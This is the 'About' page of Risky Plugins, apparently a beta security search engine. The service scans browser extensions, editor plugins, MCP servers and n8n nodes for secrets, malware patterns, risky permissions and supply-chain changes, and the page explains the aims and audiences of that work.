Evidence beats vibes
Every score should be traceable back to findings: files, permissions, dependencies, metadata, and version history. A scary number without evidence is not useful.
About Risky Plugins
A security search engine for the code people casually install.
Browser extensions, editor plugins, MCP servers, n8n nodes: they are tiny supply chain decisions made all day long. Risky Plugins makes those decisions less blind.
Why
The extension layer is a mess.
Most teams have a decent answer for packages, containers, and cloud assets. Extensions are different. They get installed by one person, become part of a workflow, then quietly keep updating from a marketplace you do not control.
That is risky even when everyone involved is acting in good faith. It gets worse when an extension changes owners, starts asking for broader permissions, ships obfuscated code, leaks a maintainer token, or pulls in a dependency nobody has looked at.
Risky Plugins exists to put a searchable security record next to those installs.
What we check
Not a magic verdict. A pile of useful signals.
The analyzer downloads extension artifacts, unpacks them, scans the contents, compares versions, and stores the findings so you can search, filter, and investigate.
01
Secrets left in packages
02
Known malware patterns
03
Dangerous permissions
04
Obfuscated or packed code
05
Risky network indicators
06
Vulnerable dependencies
07
Publisher and version changes
08
Supply-chain relationships
Extensions are software
They read pages, touch tokens, run in editors, and sit inside workflows. Treating them like harmless UI add-ons is how teams inherit avoidable risk.
Automation needs humility
Scanners catch a lot. They also miss things and sometimes overreact. Risky Plugins is built to surface signals for review, not replace judgement.
What it is for
Fast answers before an extension becomes part of your environment.
For security teams
Build an allowlist, review risky installs, watch for newly suspicious updates, and plug extension risk into existing workflows through the API.
For developers
Check editor plugins, browser extensions, MCP servers, and automation nodes before they land in your day-to-day tools or CI/CD paths.
For researchers
Compare publishers, versions, permissions, malware hits, secrets, and dependency drift across ecosystems that are usually studied one marketplace at a time.
Beta note
This is live, but it is not pretending to be finished.
The scanners, search, scorecards, and API are usable today. We are still improving false positive handling, marketplace coverage, alerting, and enterprise workflows. If a finding looks wrong, tell us. If an extension looks dangerous, treat the score as the start of the investigation, not the end of it.